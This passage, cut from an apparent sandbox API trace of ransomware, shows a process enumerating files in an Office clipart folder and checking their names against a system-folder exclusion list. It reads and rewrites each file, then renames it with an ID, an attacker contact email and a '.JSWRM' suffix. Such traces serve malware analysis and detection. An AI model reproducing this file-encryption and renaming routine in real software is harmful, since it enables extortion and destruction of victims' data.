Flags=0x0, Size=0x10) returned 0x23a2a0 [0082.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0082.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0082.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0082.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0082.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.795] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107734.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107734.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0082.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0082.796] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe3c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107742.WMF", cAlternateFileName="")) returned 1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2=".") returned 1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="..") returned 1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="...") returned 1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="windows") returned -1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="recovery") returned -1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="perflogs") returned -1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="documents and settings") returned 1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="system volume information") returned -1 [0082.796] lstrcmpiW (lpString1="J0107742.WMF", lpString2="msocache") returned -1 [0082.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0082.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107742.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107742.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107742.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0082.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107742.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107742.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107742.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0082.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0082.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0082.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.839] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3644) returned 1 [0082.839] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe30) returned 0x23fc98 [0082.840] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe30, lpOverlapped=0x0) returned 1 [0082.841] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.841] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe30, lpOverlapped=0x0) returned 1 [0082.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.841] CloseHandle (hObject=0x314) returned 1 [0082.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0082.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0082.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0082.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0082.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0082.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0082.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.842] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0082.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0082.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0082.846] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe78281d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe78281d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107744.WMF", cAlternateFileName="")) returned 1 [0082.846] lstrcmpiW (lpString1="J0107744.WMF", lpString2=".") returned 1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="..") returned 1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="...") returned 1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="windows") returned -1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="recovery") returned -1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="perflogs") returned -1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="documents and settings") returned 1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="system volume information") returned -1 [0082.847] lstrcmpiW (lpString1="J0107744.WMF", lpString2="msocache") returned -1 [0082.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0082.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107744.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107744.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107744.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0082.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107744.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107744.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107744.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0082.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0082.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0082.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.848] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5004) returned 1 [0082.848] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1380) returned 0x205850 [0082.848] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1380, lpOverlapped=0x0) returned 1 [0082.850] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.850] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1380, lpOverlapped=0x0) returned 1 [0082.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.850] CloseHandle (hObject=0x314) returned 1 [0082.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0082.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0082.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0082.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0082.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0082.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0082.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.851] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107744.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107744.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0082.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0082.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0082.851] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107746.WMF", cAlternateFileName="")) returned 1 [0082.851] lstrcmpiW (lpString1="J0107746.WMF", lpString2=".") returned 1 [0082.851] lstrcmpiW (lpString1="J0107746.WMF", lpString2="..") returned 1 [0082.852] lstrcmpiW (lpString1="J0107746.WMF", lpString2="...") returned 1 [0082.852] lstrcmpiW (lpString1="J0107746.WMF", lpString2="windows") returned -1 [0082.852] lstrcmpiW (lpString1="J0107746.WMF", lpString2="recovery") returned -1 [0082.852] lstrcmpiW (lpString1="J0107746.WMF", lpString2="perflogs") returned -1 [0082.852] lstrcmpiW (lpString1="J0107746.WMF", lpString2="documents and settings") returned 1 [0082.852] lstrcmpiW (lpString1="J0107746.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.852] lstrcmpiW (lpString1="J0107746.WMF", lpString2="system volume information") returned -1 [0082.852] lstrcmpiW (lpString1="J0107746.WMF", lpString2="msocache") returned -1 [0082.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0082.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107746.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107746.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107746.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0082.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0082.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107746.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107746.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107746.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0082.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0082.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0082.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.852] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4788) returned 1 [0082.853] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12b0) returned 0x205850 [0082.853] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x12b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x12b0, lpOverlapped=0x0) returned 1 [0082.854] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.854] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x12b0, lpOverlapped=0x0) returned 1 [0082.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.854] CloseHandle (hObject=0x314) returned 1 [0082.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0082.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0082.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0082.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0082.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0082.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.855] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0082.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.856] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7a8a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2020, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107748.WMF", cAlternateFileName="")) returned 1 [0082.856] lstrcmpiW (lpString1="J0107748.WMF", 